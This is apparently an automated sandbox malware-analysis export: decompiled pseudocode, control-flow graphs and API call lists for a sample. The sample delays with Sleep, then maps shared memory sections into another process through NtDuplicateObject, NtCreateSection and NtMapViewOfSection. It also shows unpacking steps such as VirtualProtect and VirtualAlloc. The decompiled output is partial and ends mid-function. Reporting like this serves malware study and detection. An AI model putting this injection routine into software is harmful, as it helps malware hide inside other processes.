                                                                                                    Similarity
                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 4152845823-0
                                                                                                    • Opcode ID: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                                    • Instruction ID: 515f5f5985279033342f6d13e0d75d2e799464d7355665022411b06cc3c0c42c
                                                                                                    • Opcode Fuzzy Hash: 886c6b7d3fd93a1d42f8c5386c1713bd20b837ff01857d39e84b1d41efe43a78
                                                                                                    • Instruction Fuzzy Hash: 991129F2608285EBD7005BA18DA2EA937659F01710F20057BF6037E0F2D53D9513EB1B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 521 40196c-4019a3 call 4011f5 Sleep call 401467 527 4019b2-4019f7 call 4011f5 521->527 528 4019a5-4019ad call 401558 521->528 528->527
                                                                                                    C-Code - Quality: 25%
                                                                                                    			E0040196C(void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                    				void* _t9;
                                                                                                    				void* _t11;
                                                                                                    				intOrPtr* _t13;
                                                                                                    				void* _t23;
                                                                                                    
                                                                                                    				_t19 = __edi;
                                                                                                    				_pop(es);
                                                                                                    				asm("sbb bh, [eax+ebp*2]");
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(__edi, __eflags);
                                                                                                    				_t13 =  *((intOrPtr*)(_t23 + 8));
                                                                                                    				Sleep(0x1388);
                                                                                                    				_push(_t23 - 4);
                                                                                                    				_push( *((intOrPtr*)(_t23 + 0x10)));
                                                                                                    				_push( *((intOrPtr*)(_t23 + 0xc)));
                                                                                                    				_push(_t13); // executed
                                                                                                    				_t9 = L00401467(__edi, __esi); // executed
                                                                                                    				_t29 = _t9;
                                                                                                    				if(_t9 != 0) {
                                                                                                    					E00401558(_t13, _t9,  *((intOrPtr*)(_t23 - 4)),  *((intOrPtr*)(_t23 + 0x14))); // executed
                                                                                                    				}
                                                                                                    				 *_t13(0xffffffff, 0);
                                                                                                    				_t11 = 0x1986;
                                                                                                    				_push(0x6d);
                                                                                                    				_push(0xc5);
                                                                                                    				L004011F5(_t19, _t29);
                                                                                                    				return _t11;
                                                                                                    			}







                                                                                                    0x0040196c
                                                                                                    0x0040196c
                                                                                                    0x0040196d
                                                                                                    0x0040196f
                                                                                                    0x00401981
                                                                                                    0x00401986
                                                                                                    0x0040198e
                                                                                                    0x00401994
                                                                                                    0x00401995
                                                                                                    0x00401998
                                                                                                    0x0040199b
                                                                                                    0x0040199c
                                                                                                    0x004019a1
                                                                                                    0x004019a3
                                                                                                    0x004019ad
                                                                                                    0x004019ad
                                                                                                    0x004019b6
                                                                                                    0x004019c2
                                                                                                    0x004019cf
                                                                                                    0x004019e1
                                                                                                    0x004019ee
                                                                                                    0x004019f7

                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(00001388,000000C5,0000006D), ref: 0040198E
                                                                                                      • Part of subcall function 00401558: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                      • Part of subcall function 00401558: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569022224.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                    • String ID:
                                                                                                    • API String ID: 4152845823-0
                                                                                                    • Opcode ID: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                                    • Instruction ID: 3e47f40c2c79a3419effdd93610d16f961f2ccd470e9348de27537ec9d0296a5
                                                                                                    • Opcode Fuzzy Hash: 54672eb5d74a33a50b4e0698c103b24abf47bf219929af624bad9b05e038b79e
                                                                                                    • Instruction Fuzzy Hash: CA01F2B2208244EFCB005BE58CA1EAA3765AB05315F300133F603B90F2C93C8512EB6B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.569154010.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                    • String ID:
                                                                                                    • API String ID: 3016257755-0
                                                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                    • Instruction ID: 853c7cfb1190d9a4bf9bc135105965c99ead5257da515fb9699fb845fd635cdd
                                                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                    • Instruction Fuzzy Hash: 1B11833201014EFBCF125F95DC41CEE3F22BB18354B188626FE5869171C33AC971AB85
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:4.6%
                                                                                                    Dynamic/Decrypted Code Coverage:66%
                                                                                                    Signature Coverage:6.2%
                                                                                                    Total number of Nodes:97
                                                                                                    Total number of Limit Nodes:4
                                                                                                    execution_graph 5962 40f9a0 5965 40f520 5962->5965 5964 40f9bb 5972 40f548 __write_nolock 5965->5972 5966 40f6bb GlobalAlloc 5970 40f700 5966->5970 5968 40f921 5976 40f330 LoadLibraryA 5968->5976 5973 40f180 5970->5973 5971 40f935 5971->5964 5972->5966 5974 40f1b2 VirtualProtect 5973->5974 5974->5968 5976->5971 6062 402d40 6063 402d65 6062->6063 6064 402f37 6063->6064 6065 401932 8 API calls 6063->6065 6065->6064 6106 401523 6107 401529 6106->6107 6108 401608 NtDuplicateObject 6107->6108 6115 401724 6107->6115 6109 401625 NtCreateSection 6108->6109 6108->6115 6110 4016a5 NtCreateSection 6109->6110 6111 40164b NtMapViewOfSection 6109->6111 6113 4016d1 6110->6113 6110->6115 6111->6110 6112 40166e NtMapViewOfSection 6111->6112 6112->6110 6114 40168c 6112->6114 6113->6115 6116 4016db NtMapViewOfSection 6113->6116 6114->6110 6116->6115 6117 401702 NtMapViewOfSection 6116->6117 6117->6115 5977 40b4e5 5978 40b4eb RtlEncodePointer 5977->5978 5978->5978 5979 40b505 5978->5979 6066 401749 6067 4016cf 6066->6067 6068 4016db NtMapViewOfSection 6067->6068 6070 401724 6067->6070 6069 401702 NtMapViewOfSection 6068->6069 6068->6070 6069->6070 5980 40ba6b 5983 40b8de 5980->5983 5984 40b8f2 5983->5984 5989 40cb61 5984->5989 5986 40b8fe __forcdecpt_l 5987 40cb61 __forcdecpt_l LCMapStringW 5986->5987 5988 40b91b 5987->5988 5990 40cb7f 5989->5990 5991 40cb6f 5989->5991 5993 40ca4c 5990->5993 5991->5986 5994 40ca61 5993->5994 5995 40ca6d 5994->5995 5997 409551 5994->5997 5995->5991 5998 409564 5997->5998 6001 40936a 5998->6001 6000 409585 6000->5995 6003 409388 __crtLCMapStringA_stat 6001->6003 6002 409453 LCMapStringW 6004 4093e6 __crtLCMapStringA_stat __freea __cftoe_l 6002->6004 6003->6002 6003->6004 6004->6000 6005 402e9b 6006 402ea1 6005->6006 6008 402f37 6006->6008 6009 401932 6006->6009 6010 401943 6009->6010 6011 401986 Sleep 6010->6011 6012 4019a1 6011->6012 6014 4019b2 6012->6014 6015 401558 6012->6015 6014->6008 6016 401567 6015->6016 6017 401608 NtDuplicateObject 6016->6017 6025 401724 6016->6025 6018 401625 NtCreateSection 6017->6018 6017->6025 6019 4016a5 NtCreateSection 6018->6019 6020 40164b NtMapViewOfSection 6018->6020 6022 4016d1 6019->6022 6019->6025 6020->6019 6021 40166e NtMapViewOfSection 6020->6021 6021->6019 6023 40168c 6021->6023 6024 4016db NtMapViewOfSection 6022->6024 6022->6025 6023->6019 6024->6025 6026 401702 NtMapViewOfSection 6024->6026 6025->6014 6026->6025 6027 1e66d1b 6028 1e66d2a 6027->6028 6031 1e674bb 6028->6031 6033 1e674d6 6031->6033 6032 1e674df CreateToolhelp32Snapshot 6032->6033 6034 1e674fb Module32First 6032->6034 6033->6032 6033->6034 6035 1e6750a 6034->6035 6037 1e66d33 6034->6037 6038 1e6717a 6035->6038 6039 1e671a5 6038->6039 6040 1e671b6 VirtualAlloc 6039->6040 6041 1e671ee 6039->6041 6040->6041 6041->6041 6101 402d7d 6102 402d83 6101->6102 6104 402deb 6101->6104 6103 401932 8 API calls 6105 402f37 6103->6105 6104->6103 6104->6105 6118 40193d 6119 40196a 6118->6119 6120 401986 Sleep 6119->6120 6121 4019a1 6120->6121 6122 401558 7 API calls 6121->6122 6123 4019b2 6121->6123 6122->6123

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 401558-4015b2 call 4011f5 12 4015b4 0->12 13 4015b7-4015bc 0->13 12->13 15 4015c2-4015d3 13->15 16 4018d7-4018df 13->16 20 4018d5 15->20 21 4015d9-401602 15->21 16->13 19 4018e4-40192f call 4011f5 16->19 20->19 21->20 28 401608-40161f NtDuplicateObject 21->28 28->20 30 401625-401649 NtCreateSection 28->30 32 4016a5-4016cb NtCreateSection 30->32 33 40164b-40166c NtMapViewOfSection 30->33 32->20 37 4016d1-4016d5 32->37 33->32 35 40166e-40168a NtMapViewOfSection 33->35 35->32 38 40168c-4016a2 35->38 37->20 40 4016db-4016fc NtMapViewOfSection 37->40 38->32 40->20 42 401702-40171e NtMapViewOfSection 40->42 42->20 45 401724 42->45 45->20 46 401724 call 401729 45->46 46->20
                                                                                                    C-Code - Quality: 79%
                                                                                                    			E00401558(intOrPtr _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                    				void* _v8;
                                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                                    				void* _v16;
                                                                                                    				void* _v20;
                                                                                                    				char _v44;
                                                                                                    				char _v52;
                                                                                                    				intOrPtr _v56;
                                                                                                    				long _v60;
                                                                                                    				char _v64;
                                                                                                    				void* _v68;
                                                                                                    				char _v72;
                                                                                                    				void* _v76;
                                                                                                    				char _v84;
                                                                                                    				char _v88;
                                                                                                    				char _v92;
                                                                                                    				intOrPtr _v96;
                                                                                                    				char _v100;
                                                                                                    				void* __edi;
                                                                                                    				intOrPtr _t87;
                                                                                                    				struct _EXCEPTION_RECORD _t90;
                                                                                                    				intOrPtr _t91;
                                                                                                    				struct _GUID _t97;
                                                                                                    				struct _GUID _t99;
                                                                                                    				long _t100;
                                                                                                    				PVOID* _t121;
                                                                                                    				PVOID* _t123;
                                                                                                    				intOrPtr _t127;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t183;
                                                                                                    				intOrPtr* _t184;
                                                                                                    				HANDLE* _t185;
                                                                                                    				HANDLE* _t186;
                                                                                                    				intOrPtr _t199;
                                                                                                    				void* _t200;
                                                                                                    				intOrPtr* _t201;
                                                                                                    				void* _t205;
                                                                                                    
                                                                                                    				_push(0x387);
                                                                                                    				_t201 = _t200 + 4;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t175, _t205);
                                                                                                    				_t127 = _a4;
                                                                                                    				_t176 = 0;
                                                                                                    				_v56 = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					_v56 = _v56 + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
                                                                                                    					if(_t87 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				_v96 = _t87;
                                                                                                    				_t183 =  &_v100;
                                                                                                    				 *_t183 = _t176;
                                                                                                    				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t183);
                                                                                                    				_t90 =  *_t183;
                                                                                                    				if(_t90 != 0) {
                                                                                                    					_t132 =  &_v52;
                                                                                                    					 *_t132 = _t90;
                                                                                                    					 *(_t132 + 4) = _t176;
                                                                                                    					_t184 =  &_v44;
                                                                                                    					 *((intOrPtr*)(_t127 + 0x10))(_t184, 0x18);
                                                                                                    					 *_t184 = 0x18;
                                                                                                    					_push( &_v52);
                                                                                                    					_push(_t184);
                                                                                                    					_push(0x40);
                                                                                                    					_push( &_v20);
                                                                                                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t176, _t176, 2) == 0) {
                                                                                                    						_v12 = _t176;
                                                                                                    						_t97 =  &_v84;
                                                                                                    						 *(_t97 + 4) = _t176;
                                                                                                    						 *_t97 = 0x5000;
                                                                                                    						_t185 =  &_v88;
                                                                                                    						if(NtCreateSection(_t185, 6, _t176, _t97, 4, 0x8000000, _t176) == 0) {
                                                                                                    							_push(_v84);
                                                                                                    							_pop( *_t25);
                                                                                                    							_t121 =  &_v72;
                                                                                                    							 *_t121 = _t176;
                                                                                                    							if(NtMapViewOfSection( *_t185, 0xffffffff, _t121, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
                                                                                                    								_t123 =  &_v64;
                                                                                                    								 *_t123 = _t176;
                                                                                                    								if(NtMapViewOfSection( *_t185, _v16, _t123, _t176, _t176, _t176,  &_v60, 1, _t176, 4) == 0) {
                                                                                                    									_t199 = _v72;
                                                                                                    									 *((intOrPtr*)(_t127 + 0x20))(_t176, _t199, 0x104);
                                                                                                    									 *((intOrPtr*)(_t199 + 0x208)) = _a16;
                                                                                                    									_v12 = _v12 + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t99 =  &_v84;
                                                                                                    						 *(_t99 + 4) = _t176;
                                                                                                    						 *_t99 = _a12 + 0x10000;
                                                                                                    						_t186 =  &_v92;
                                                                                                    						_t100 = NtCreateSection(_t186, 0xe, _t176, _t99, 0x40, 0x8000000, _t176);
                                                                                                    						if (_t100 != 0) goto L67;
                                                                                                    						 *_t100 =  *_t100 + _t100;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t91 =  *_t201;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t176, _t226);
                                                                                                    				return _t91;
                                                                                                    			}









































                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164b
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                                    • Instruction ID: 4afb5ad6e9f78dbb0f0fc4dd380045413720c66cee1019041566b0107d6eeca4
                                                                                                    • Opcode Fuzzy Hash: 94fb41d671dbeab80d9278360f7b723801272b6da464276eb8e79f9657775aa6
                                                                                                    • Instruction Fuzzy Hash: 2F615E71900208FBEB209F91CC49FAF7BB8EF85B14F10412AF912BA1E5D6749901DB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 47 401564-4015b2 call 4011f5 57 4015b4 47->57 58 4015b7-4015bc 47->58 57->58 60 4015c2-4015d3 58->60 61 4018d7-4018df 58->61 65 4018d5 60->65 66 4015d9-401602 60->66 61->58 64 4018e4-40192f call 4011f5 61->64 65->64 66->65 73 401608-40161f NtDuplicateObject 66->73 73->65 75 401625-401649 NtCreateSection 73->75 77 4016a5-4016cb NtCreateSection 75->77 78 40164b-40166c NtMapViewOfSection 75->78 77->65 82 4016d1-4016d5 77->82 78->77 80 40166e-40168a NtMapViewOfSection 78->80 80->77 83 40168c-4016a2 80->83 82->65 85 4016db-4016fc NtMapViewOfSection 82->85 83->77 85->65 87 401702-40171e NtMapViewOfSection 85->87 87->65 90 401724 87->90 90->65 91 401724 call 401729 90->91 91->65
                                                                                                    C-Code - Quality: 83%
                                                                                                    			E00401564(void* __eax, void* __edx, void* __esi) {
                                                                                                    				intOrPtr _t89;
                                                                                                    				struct _EXCEPTION_RECORD _t92;
                                                                                                    				intOrPtr _t93;
                                                                                                    				struct _GUID _t99;
                                                                                                    				struct _GUID _t101;
                                                                                                    				long _t102;
                                                                                                    				PVOID* _t123;
                                                                                                    				PVOID* _t125;
                                                                                                    				intOrPtr _t129;
                                                                                                    				struct _EXCEPTION_RECORD* _t135;
                                                                                                    				void* _t179;
                                                                                                    				struct _EXCEPTION_RECORD _t180;
                                                                                                    				struct _EXCEPTION_RECORD* _t190;
                                                                                                    				intOrPtr* _t192;
                                                                                                    				HANDLE* _t193;
                                                                                                    				HANDLE* _t194;
                                                                                                    				void* _t207;
                                                                                                    				void* _t208;
                                                                                                    				void* _t210;
                                                                                                    				intOrPtr* _t211;
                                                                                                    				void* _t216;
                                                                                                    
                                                                                                    				_t216 = __eax + 0x15a4b8;
                                                                                                    				_push(0x387);
                                                                                                    				_t211 = _t210 + 4;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t179, _t216);
                                                                                                    				_t129 =  *((intOrPtr*)(_t208 + 8));
                                                                                                    				_t180 = 0;
                                                                                                    				 *((intOrPtr*)(_t208 - 0x34)) = 0;
                                                                                                    				if(gs != 0) {
                                                                                                    					 *((intOrPtr*)(_t208 - 0x34)) =  *((intOrPtr*)(_t208 - 0x34)) + 1;
                                                                                                    				}
                                                                                                    				while(1) {
                                                                                                    					_t89 =  *((intOrPtr*)(_t129 + 0x48))();
                                                                                                    					if(_t89 != 0) {
                                                                                                    						break;
                                                                                                    					}
                                                                                                    					 *((intOrPtr*)(_t129 + 0x1c))(0x3e8);
                                                                                                    				}
                                                                                                    				 *((intOrPtr*)(_t208 - 0x5c)) = _t89;
                                                                                                    				_t190 = _t208 - 0x60;
                                                                                                    				 *_t190 = _t180;
                                                                                                    				 *((intOrPtr*)(_t129 + 0x4c))(_t89, _t190);
                                                                                                    				_t92 =  *_t190;
                                                                                                    				if(_t92 != 0) {
                                                                                                    					_t135 = _t208 - 0x30;
                                                                                                    					 *_t135 = _t92;
                                                                                                    					 *(_t135 + 4) = _t180;
                                                                                                    					_t192 = _t208 - 0x28;
                                                                                                    					 *((intOrPtr*)(_t129 + 0x10))(_t192, 0x18);
                                                                                                    					 *_t192 = 0x18;
                                                                                                    					_push(_t208 - 0x30);
                                                                                                    					_push(_t192);
                                                                                                    					_push(0x40);
                                                                                                    					_push(_t208 - 0x10);
                                                                                                    					if( *((intOrPtr*)(_t129 + 0x70))() == 0 && NtDuplicateObject( *(_t208 - 0x10), 0xffffffff, 0xffffffff, _t208 - 0xc, _t180, _t180, 2) == 0) {
                                                                                                    						 *(_t208 - 8) = _t180;
                                                                                                    						_t99 = _t208 - 0x50;
                                                                                                    						 *(_t99 + 4) = _t180;
                                                                                                    						 *_t99 = 0x5000;
                                                                                                    						_t193 = _t208 - 0x54;
                                                                                                    						if(NtCreateSection(_t193, 6, _t180, _t99, 4, 0x8000000, _t180) == 0) {
                                                                                                    							 *_t25 =  *(_t208 - 0x50);
                                                                                                    							_t123 = _t208 - 0x44;
                                                                                                    							 *_t123 = _t180;
                                                                                                    							if(NtMapViewOfSection( *_t193, 0xffffffff, _t123, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
                                                                                                    								_t125 = _t208 - 0x3c;
                                                                                                    								 *_t125 = _t180;
                                                                                                    								if(NtMapViewOfSection( *_t193,  *(_t208 - 0xc), _t125, _t180, _t180, _t180, _t208 - 0x38, 1, _t180, 4) == 0) {
                                                                                                    									_t207 =  *(_t208 - 0x44);
                                                                                                    									 *((intOrPtr*)(_t129 + 0x20))(_t180, _t207, 0x104);
                                                                                                    									 *((intOrPtr*)(_t207 + 0x208)) =  *((intOrPtr*)(_t208 + 0x14));
                                                                                                    									 *(_t208 - 8) =  *(_t208 - 8) + 1;
                                                                                                    								}
                                                                                                    							}
                                                                                                    						}
                                                                                                    						_t101 = _t208 - 0x50;
                                                                                                    						 *(_t101 + 4) = _t180;
                                                                                                    						 *_t101 =  *((intOrPtr*)(_t208 + 0x10)) + 0x10000;
                                                                                                    						_t194 = _t208 - 0x58;
                                                                                                    						_t102 = NtCreateSection(_t194, 0xe, _t180, _t101, 0x40, 0x8000000, _t180);
                                                                                                    						if (_t102 != 0) goto L66;
                                                                                                    						 *_t102 =  *_t102 + _t102;
                                                                                                    					}
                                                                                                    				}
                                                                                                    				_push(0x15a4);
                                                                                                    				_t93 =  *_t211;
                                                                                                    				_push(0x83);
                                                                                                    				L004011F5(_t180, _t237);
                                                                                                    				return _t93;
                                                                                                    			}
























                                                                                                    0x00401566
                                                                                                    0x00401578
                                                                                                    0x00401580
                                                                                                    0x00401592
                                                                                                    0x0040159f
                                                                                                    0x004015a4
                                                                                                    0x004015a7
                                                                                                    0x004015a9
                                                                                                    0x004015b2
                                                                                                    0x004015b4
                                                                                                    0x004015b4
                                                                                                    0x004015b7
                                                                                                    0x004015b7
                                                                                                    0x004015bc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004018dc
                                                                                                    0x004018dc
                                                                                                    0x004015c2
                                                                                                    0x004015c5
                                                                                                    0x004015c8
                                                                                                    0x004015cc
                                                                                                    0x004015cf
                                                                                                    0x004015d3
                                                                                                    0x004015d9
                                                                                                    0x004015dc
                                                                                                    0x004015de
                                                                                                    0x004015e1
                                                                                                    0x004015e7
                                                                                                    0x004015ea
                                                                                                    0x004015f8
                                                                                                    0x004015f9
                                                                                                    0x004015fa
                                                                                                    0x004015fc
                                                                                                    0x00401602
                                                                                                    0x00401625
                                                                                                    0x00401628
                                                                                                    0x0040162b
                                                                                                    0x0040162e
                                                                                                    0x00401634
                                                                                                    0x00401649
                                                                                                    0x0040164e
                                                                                                    0x00401651
                                                                                                    0x00401654
                                                                                                    0x0040166c
                                                                                                    0x0040166e
                                                                                                    0x00401671
                                                                                                    0x0040168a
                                                                                                    0x0040168c
                                                                                                    0x00401696
                                                                                                    0x0040169c
                                                                                                    0x004016a2
                                                                                                    0x004016a2
                                                                                                    0x0040168a
                                                                                                    0x0040166c
                                                                                                    0x004016a5
                                                                                                    0x004016b1
                                                                                                    0x004016b4
                                                                                                    0x004016b6
                                                                                                    0x004016c6
                                                                                                    0x004016cb
                                                                                                    0x004016cf
                                                                                                    0x004016cf
                                                                                                    0x00401602
                                                                                                    0x004018ea
                                                                                                    0x004018ef
                                                                                                    0x00401914
                                                                                                    0x00401926
                                                                                                    0x0040192f

                                                                                                    APIs
                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401617
                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401644
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401667
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401685
                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016C6
                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016F7
                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401719
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.631189468.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_400000_uwjrhss.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                    • String ID:
                                                                                                    • API String ID: 1546783058-0
                                                                                                    • Opcode ID: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                                    • Instruction ID: 3c61d4fa49215657d74707620d36eaa57d50516e3f831c539a14d6838cb40392
                                                                                                    • Opcode Fuzzy Hash: 25fb98b4f42f8453298f183ae8c9fe853ab2af685c4accb6617153fec11399dc
                                                                                                    • Instruction Fuzzy Hash: 23513CB1900249FBEB209F91CC49FAF7BB8EF85710F14412AF911BA1E5D6749941CB24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 132 401577-4015b2 call 4011f5 139 4015b4 132->139 140 4015b7-4015bc 132->140 139->140 142 4015c2-4015d3 140->142 143 4018d7-4018df 140->143 147 4018d5 142->147 148 4015d9-401602 142->148 143->140 146 4018e4-40192f call 4011f5 143->146 147->146 148->147 155 401608-40161f NtDuplicateObject 148->155 155->147 157 401625-401649 NtCreateSection 155->157 159 4016a5-4016cb NtCreateSection 157->159 160 40164b-40166c NtMapViewOfSection 157->160 159->147 164 4016d1-4016d5 159->164 160->159 162 40166e-40168a NtMapViewOfSection 160->162 162->159 165 40168c-4016a2 162->165 164->147 167 4016db-4016fc NtMapViewOfSection 164->167 165->159 167->147 169 401702-40171e NtMapViewOfSection 167->169 169->147 172 401724 169->172 172->147 173 401724 call 401729 172->173 173->147
                                                                                                    C-Code - Quality: 81%
                                                                                                    			E00401577() {
                                                                                                    				intOrPtr _t86;
                                                                                                    				struct _EXCEPTION_RECORD _t89;
                                                                                                    				intOrPtr _t90;
                                                                                                    				struct _GUID _t96;
                                                                                                    				struct _GUID _t98;
                                                                                                    				long _t99;
                                                                                                    				PVOID* _t120;
                                                                                                    				PVOID* _t122;
                                                                                                    				intOrPtr _t126;
                                                                                                    				struct _EXCEPTION_RECORD* _t132;
                                                                                                    				void* _t175;
                                                                                                    				struct _EXCEPTION_RECORD _t176;
                                                                                                    				struct _EXCEPTION_RECORD* _t184;
                                                                                                    				intOrPtr* _t186;
                                                                                                    				HANDLE* _t187;
                                                                                                    				HANDLE* _t188;
                                                                                                    				void* _t201;
                                                                                                    				void* _t202;
                                                                                                    				void* _t204;
                                                                                                    				intOrPtr* _t205;
                                                                                                    				void* _t210;
                                                                                                    
                                                                                                    				asm("repe push 0x387");
